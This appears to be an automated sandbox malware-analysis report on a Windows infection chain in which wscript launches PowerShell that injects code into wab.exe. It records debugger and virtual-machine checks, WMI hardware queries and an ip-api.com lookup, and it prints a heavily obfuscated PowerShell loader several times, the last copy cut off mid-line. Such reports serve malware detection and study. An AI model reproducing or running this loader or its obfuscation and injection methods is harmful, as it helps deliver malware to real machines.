            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 4BB833B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 20B60000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 20C50000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 20B60000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9921Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9853Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416Thread sleep count: 9853 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: wab.exe, 0000000F.00000002.882847947414.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882847947414.00000000050EF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000009.00000002.882938896282.0000021672499000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllat
            Source: powershell.exe, 0000000D.00000002.878917749751.0000000008746000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_22C95380 CheckRemoteDebuggerPresent,15_2_22C95380
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_02CED8D0 LdrInitializeThunk,LdrInitializeThunk,13_2_02CED8D0
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeCode function: 16_2_007E2A7E GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,16_2_007E2A7E
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeCode function: 16_2_007E3450 SetUnhandledExceptionFilter,16_2_007E3450
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeCode function: 16_2_007E32C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_007E32C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Yara matchFile source: amsi64_2680.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2680, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6840, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4460000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2EDFB78Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds';if (${host}.currentculture) {$smaastykker++;}function immatrikulationens($marios){$syntomy=$marios.length-$smaastykker;$pronenesses='substri';$pronenesses+='ng';for( $dipsomaniacs=2;$dipsomaniacs -lt $syntomy;$dipsomaniacs+=3){$nugacities+=$marios.$pronenesses.invoke( $dipsomaniacs, $smaastykker);}$nugacities;}function influerende($svippedes){ . ($gnier111) ($svippedes);}$sclaffs=immatrikulationens 'humn,ogazhuikal,elbeada/p,5la.fr0ru he(a wpuicun udkuo .wsls l .n step li1 b0fy.p,0.y;i. .ewcaib,ns,6di4te;vi bx,o6e.4,i;no burulvgl:un1co2sy1d.. u0 n)sw igscev c.hkcyono/ c2ch0cu1tr0di0ko1dr0pe1li awf.ni drareorft.osixco/r 1 2re1 j.so0.a ';$dissers=immatrikulationens 'g u es ne .r,e-ida agemes,nsttso ';$redesignating=immatrikulationens ' rhaft ctbeps sku:va/ p/ .datrudif,vovesa. ugtaosko,eg ulsoeca.syc uo emve/,eubeckr?d,ecoxi,p ko ,r stin=,ediro .wk.n.el,rochagld.a&fristd.e=ac1n,t utax o3inpkagrov .qomo mu ayreud.nov0unpmovfifa.0s.s ,1prvchusao,eok.v,upv,zvace 7ar6phtud5 ';$bourre=immatrikulationens 's,>i ';$gnier111=immatrikulationens 'friske ix ';$hoodwinked='fiskeflaaderne';$parastades = immatrikulationens ' fegacf,h fo,r .l%k.a epalpspdjiaoutpeau,%,l\frbmoe ol ylatet rkiipacun7c.4 f.g,ab,f rsek fo&st&k, hecyc dhkloco u.t n ';influerende (immatrikulationens 'ti$exgallidohubbea klsa: .cdehjeahecspocun nn fegur us j1 s7a,2.v=be(caccammads si/tucex co$p.ptwasirdeas.s,ft aaaedreekospe),r ');influerende (immatrikulationens 'sn$s.g olcuofobtuanoll :krhkoybag .idiei,junnske uk oo amvemeksmii oo .nubedenudsw,= t$derjae.jd ee .sbiiingopn,sayat risonfeg t.c.s.vpb.lgei stun(fa$ ub o au.tr frbyep.) ');influerende (immatrikulationens ' t[ in ieurtps.p s,berer iv .iticreedupplo iiafno,tlims,alin ta hg mekordi]no:fi: spre,gcs,utir iunt,eyampbrrceo ettrouscstosvl e ,o= t i [anndreunt.k.f sdeewectuu .r.hi ,t,myatp.tr sohitfoom,cduo lunt.uy apsle r] l:s.: ,toflsmspa1un2 a ');$redesignating=$hygiejnekommsionens[0];$fangstbaaden190= (immatrikulationens 'am$,igunlhaoeqbkla.al,e:.lkcoosun ,sfoe rk mvteec,nl,thjeposos=.mnfieopws -w,o ab .jbleincdetca ths pyresanttee .mmu.epn kep.t a.s,wsoe,ebovc .lfaikbea.nlkt');$fangstbaaden190+=$chaconners172[1];influerende ($fangstbaaden190);influerende (immatrikulationens 'ar$tokfookvnovsk.edok,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds';if (${host}.currentculture) {$smaastykker++;}function immatrikulationens($marios){$syntomy=$marios.length-$smaastykker;$pronenesses='substri';$pronenesses+='ng';for( $dipsomaniacs=2;$dipsomaniacs -lt $syntomy;$dipsomaniacs+=3){$nugacities+=$marios.$pronenesses.invoke( $dipsomaniacs, $smaastykker);}$nugacities;}function influerende($svippedes){ . ($gnier111) ($svippedes);}$sclaffs=immatrikulationens 'humn,ogazhuikal,elbeada/p,5la.fr0ru he(a wpuicun udkuo .wsls l .n step li1 b0fy.p,0.y;i. .ewcaib,ns,6di4te;vi bx,o6e.4,i;no burulvgl:un1co2sy1d.. u0 n)sw igscev c.hkcyono/ c2ch0cu1tr0di0ko1dr0pe1li awf.ni drareorft.osixco/r 1 2re1 j.so0.a ';$dissers=immatrikulationens 'g u es ne .r,e-ida agemes,nsttso ';$redesignating=immatrikulationens ' rhaft ctbeps sku:va/ p/ .datrudif,vovesa. ugtaosko,eg ulsoeca.syc uo emve/,eubeckr?d,ecoxi,p ko ,r stin=,ediro .wk.n.el,rochagld.a&fristd.e=ac1n,t utax o3inpkagrov .qomo mu ayreud.nov0unpmovfifa.0s.s ,1prvchusao,eok.v,upv,zvace 7ar6phtud5 ';$bourre=immatrikulationens 's,>i ';$gnier111=immatrikulationens 'friske ix ';$hoodwinked='fiskeflaaderne';$parastades = immatrikulationens ' fegacf,h fo,r .l%k.a epalpspdjiaoutpeau,%,l\frbmoe ol ylatet rkiipacun7c.4 f.g,ab,f rsek fo&st&k, hecyc dhkloco u.t n ';influerende (immatrikulationens 'ti$exgallidohubbea klsa: .cdehjeahecspocun nn fegur us j1 s7a,2.v=be(caccammads si/tucex co$p.ptwasirdeas.s,ft aaaedreekospe),r ');influerende (immatrikulationens 'sn$s.g olcuofobtuanoll :krhkoybag .idiei,junnske uk oo amvemeksmii oo .nubedenudsw,= t$derjae.jd ee .sbiiingopn,sayat risonfeg t.c.s.vpb.lgei stun(fa$ ub o au.tr frbyep.) ');influerende (immatrikulationens ' t[ in ieurtps.p s,berer iv .iticreedupplo iiafno,tlims,alin ta hg mekordi]no:fi: spre,gcs,utir iunt,eyampbrrceo ettrouscstosvl e ,o= t i [anndreunt.k.f sdeewectuu .r.hi ,t,myatp.tr sohitfoom,cduo lunt.uy apsle r] l:s.: ,toflsmspa1un2 a ');$redesignating=$hygiejnekommsionens[0];$fangstbaaden190= (immatrikulationens 'am$,igunlhaoeqbkla.al,e:.lkcoosun ,sfoe rk mvteec,nl,thjeposos=.mnfieopws -w,o ab .jbleincdetca ths pyresanttee .mmu.epn kep.t a.s,wsoe,ebovc .lfaikbea.nlkt');$fangstbaaden190+=$chaconners172[1];influerende ($fangstbaaden190);influerende (immatrikulationens 'ar$tokfookvnovsk.edok,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds';if (${host}.currentculture) {$smaastykker++;}function immatrikulationens($marios){$syntomy=$marios.length-$smaastykker;$pronenesses='substri';$pronenesses+='ng';for( $dipsomaniacs=2;$dipsomaniacs -lt $syntomy;$dipsomaniacs+=3){$nugacities+=$marios.$pronenesses.invoke( $dipsomaniacs, $smaastykker);}$nugacities;}function influerende($svippedes){ . ($gnier111) ($svippedes);}$sclaffs=immatrikulationens 